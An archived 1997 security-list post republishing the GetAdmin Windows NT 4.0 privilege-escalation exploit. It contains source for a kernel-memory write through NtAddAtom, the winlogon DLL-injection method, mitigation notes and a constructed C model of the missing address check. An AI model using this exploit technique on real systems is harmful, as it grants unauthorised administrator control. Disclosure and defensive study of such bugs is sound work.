GetAdmin NT exploit

Christopher Klaus (cklaus@ISS.NET)
Tue, 08 Jul 1997 11:19:00 -0400

Windows NT 4.0 Exploit: Allows intruders to become administrators on
the machine.

Works on Windows 4.0 with Service Pack 3 installed.

Web: http://cmp.phys.msu.su/ntclub/pub/code.htm

GetAdmin source code.

Here's my program GetAdmin.

This program can get administrator rights without any special
privileges. Simply run GetAdmin or GetAdmin account_name from the command
line. If you do not enter account_name, the current account will be used.

How does it work?

Here's the string that does it all in getadmin:
ChangeNtGlobalFlag(GetNtGlobalFlagPtr()); After that you can open any
process in the system, because the function NtOpenProcess does not check
for SE_DEBUG_PRIVILEGE if a bit in NtGlobalFlag+2 is set. After that, the
program injects a dll into the winlogon process. Winlogon has the SYSTEM
account, so it can add / remove a user in the administrator group.

Function ChangeNtGlobalFlag :

    BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag)
    {
        DWORD callnumber = 0x3; //NtAddAtom
        DWORD stack[32];
        int i;
        DWORD handle = 0;
        CHAR string[255];

        if (!pNtGlobalFlag) return 0;

        stack[0] = (DWORD)string;
        stack[1] = (DWORD)&handle; //pNtGlobalFlag;

        for (i = 0; i < 0x100; i++)
        {
            sprintf(string, "NT now cracking... pass %d", i);

            if (handle & 0xf00) {
                stack[1] = (DWORD)pNtGlobalFlag + 1;
            }

            __asm {
                mov eax, callnumber;
                mov edx, stack;
                lea edx, dword ptr [stack];
                int 0x2e;
            }

            if (stack[1] == pNtGlobalFlag + 1) break;
        }

        return TRUE;
    }

The bug is that a subfunction in NtAddAtom does not check the address of
the output. So it is possible to write to any place in kernel memory. Of
course it is not necessary to inject a dll into winlogon; to get admin
rights you can simply patch same place of ntoskernel, or replace the
process token, etc. If you have get full source code
please click here.

Preventing the Attack:

There is only one real way: patch ntoskernel and replace the function
NtAddAtom so it checks for a valid address.
You can remove all access from ntoskernel, but it is possible to enter a
fixed address of NtGlobalFlag in getadmin. And there exist other ways to
get administrator rights if you can write to kernel memory.

I informed Microsoft about this 30 Jun 97.

Konstantin Sobolev.
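
The check the post says is missing, shown as an added example that is not part of the original message and is not NT code. It models a service routine that stores a result at a caller-supplied address, first without and then with validation of that address; the flat address-space model, the constants and the function names are all hypothetical.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Constructed model: offsets below USER_LIMIT belong to the caller,
   everything at or above it stands in for kernel memory. */
#define SPACE_SIZE      0x10000u
#define USER_LIMIT      0x8000u
#define GLOBAL_FLAG_OFF 0xC000u   /* hypothetical kernel global */

static uint8_t space[SPACE_SIZE];

/* 1 only if [addr, addr+len) lies entirely inside the user range. */
static int user_range_ok(uint32_t addr, uint32_t len)
{
    if (len == 0) return 1;
    if (addr >= USER_LIMIT) return 0;        /* starts in kernel range   */
    if (len > USER_LIMIT - addr) return 0;   /* straddles the boundary;  */
    return 1;                                /* no addr+len, so no wrap  */
}

/* Before: the result is stored wherever the caller points. */
int add_atom_unchecked(uint32_t out_addr, uint16_t atom)
{
    if (out_addr > SPACE_SIZE - sizeof atom) return -1; /* stay in model */
    memcpy(&space[out_addr], &atom, sizeof atom);
    return 0;
}

/* After: the output address is validated before anything is written. */
int add_atom_checked(uint32_t out_addr, uint16_t atom)
{
    if (!user_range_ok(out_addr, (uint32_t)sizeof atom)) return -1;
    memcpy(&space[out_addr], &atom, sizeof atom);
    return 0;
}

uint16_t read16(uint32_t off)
{
    uint16_t v;
    memcpy(&v, &space[off], sizeof v);
    return v;
}

int main(void)
{
    /* Exit 0 when the validated path refuses the kernel-range address. */
    return add_atom_checked(GLOBAL_FLAG_OFF, 0xC001) == -1 ? 0 : 1;
}
```

The range test compares the length against the space remaining below the limit rather than computing addr+len, so an address near the top of the 32-bit range cannot wrap past the check.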